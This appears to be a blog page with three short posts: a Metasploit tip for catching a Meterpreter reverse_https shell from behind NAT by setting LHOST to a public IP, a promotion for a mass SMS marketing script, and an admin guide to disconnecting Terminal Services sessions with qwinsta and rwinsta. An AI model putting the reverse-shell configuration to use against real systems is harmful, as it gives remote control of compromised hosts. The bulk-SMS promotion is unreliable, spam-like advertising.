Thursday, May 25, 2017

Metasploit Get Shell Through NAT

You can use meterpreter/reverse_https and set LHOST to your public ip. Make sure you forward port 443 to the machine hosting metasploit.
set payload windows/meterpreter/reverse_https
set LPORT 443
set LHOST YOUR PUBLIC IP
"Since our attacker host is behind NAT, we have to use the public IP address of the router/firewall as LHOST. When the exploit is executed, this IP will be embedded in the shellcode and when the initial Meterpreter shellcode runs on the target, it will connect back to this IP address. The port forwarding on our router/firewall will then forward traffic to our LAN IP of the attacker host. For this reason, we need to set LHOST to 1.1.1.1 (the public IP of your attacker router/firewall)
Using a public IP as LHOST also means that Metasploit will attempt to bind itself to that IP when setting up the Meterpreter handler. Since this IP belongs to the router/firewall and not to the Metasploit instance, this will obviously fail. The good thing is that Metasploit will automatically fall back to 0.0.0.0 and basically serve the Meterpreter handler on all local IPs on the attacker host, while remembering that LHOST was set to our public IP address. This is exactly what we need."
at No comments:

MASSIVE SMS MARKETING

 398 Downloads (This Week)
 Last Update: 
DownloadSMS script
Browse All Files
Smser

Description

Simple and easy for modification, PHP script for SMS text messages sending API. SMS Gateway (Australia, United Kingdom, United States, Brazil, Türkiye, España, Suomi, México, Italia, India, France, Malaysia, Argentina, Colombia, Canada, Indonesia, Deutschland, Nigeria, Kenya, Ethiopia, Egypt, Philippines and Worldwide coverage!) through HTTP with your Virtual mobile number and delivery reports. You just have to type your account information ( https://www.proovl.com  ) and upload file on server. 

https://www.youtube.com/watch?v=dfPh7Qs_twk 
https://www.youtube.com/channel/UCYuMRNb_SRZ4FMsZjnHRZUA 


https://www.proovl.com/websms 

Numbers for SMS => https://www.proovl.com 
One-day SMS numbers => https://www.groovl.com 

receive sms online script
https://sourceforge.net/projects/sms-number/
Bulk SMS script
https://sourceforge.net/projects/bulk-sms-script/
http://aaronsmith-tech.blogspot.com/2017/04/send-text-messages-from-website-using.html 
at No comments:

Howto: Remotely disconnect a Terminal Services Session

I’ve written about another method for remotely disconnecting a terminal server session can be found here.
Windows server 2000/2003 allows two remote terminal services connections for administrative purposes.  Every once in a while I’ll get the “You exceeded the allowed connection count” message when trying to connect to a server via RDP, because previous sessions were not disconnected correctly.
You can use either of the following methods to remotely disconnect Terminal Server sessions.
Method 1
You can normally run the Terminal Services Manager program on another server, or even from a Windows XP workstation, to disconnect Terminal Services connections by clicking Start – Run and then typing
%SystemRoot%\system32\tsadmin.exe
This will launch the local copy of Terminal Services Manager.  Next right click on All Listed Servers and select Connect to Computer.  Type in the name or IP address of the server you wish to manage. 
 All Listed Servers in Terminal Services Manager
Select your server from the left pane, then select the Sessions tab from the right pane.  Right click on the session you wish to disconnect and select Disconnect.
You should now be able to login to the target server via Terminal Services.
Method 2
Authenticate to the server you wish to manage.  You can easily accomplish this by mapping a network drive to a share on the target server.  Start a command prompt and type
qwinsta /server:yourservername
where yourservername is the name or IP address of the server you wish to manage.
In my case I ran qwinsta /server:10.0.0.2
You can see the Administrator account is logged into session 0 and the admin account is logged into session 1.  To disconnect the admin session with ID=1 I’ll run the following from a command prompt:
rwinsta ID /server:yourservername
where ID is the process ID of the sesstion you wish to terminate, and yourservername is the name or IP address of the server you wish to manage.
In my case I ran rwinsta 1 /server:10.0.0.2
I again ran qwinsta /server:10.0.0.2 which verified session 1 had been disconnected.  I confirmed that I was once again able to login to Terminal Services.
Thanks to Ingo for some of the information, which I found via Andy
at No comments:
Subscribe to: Posts (Atom)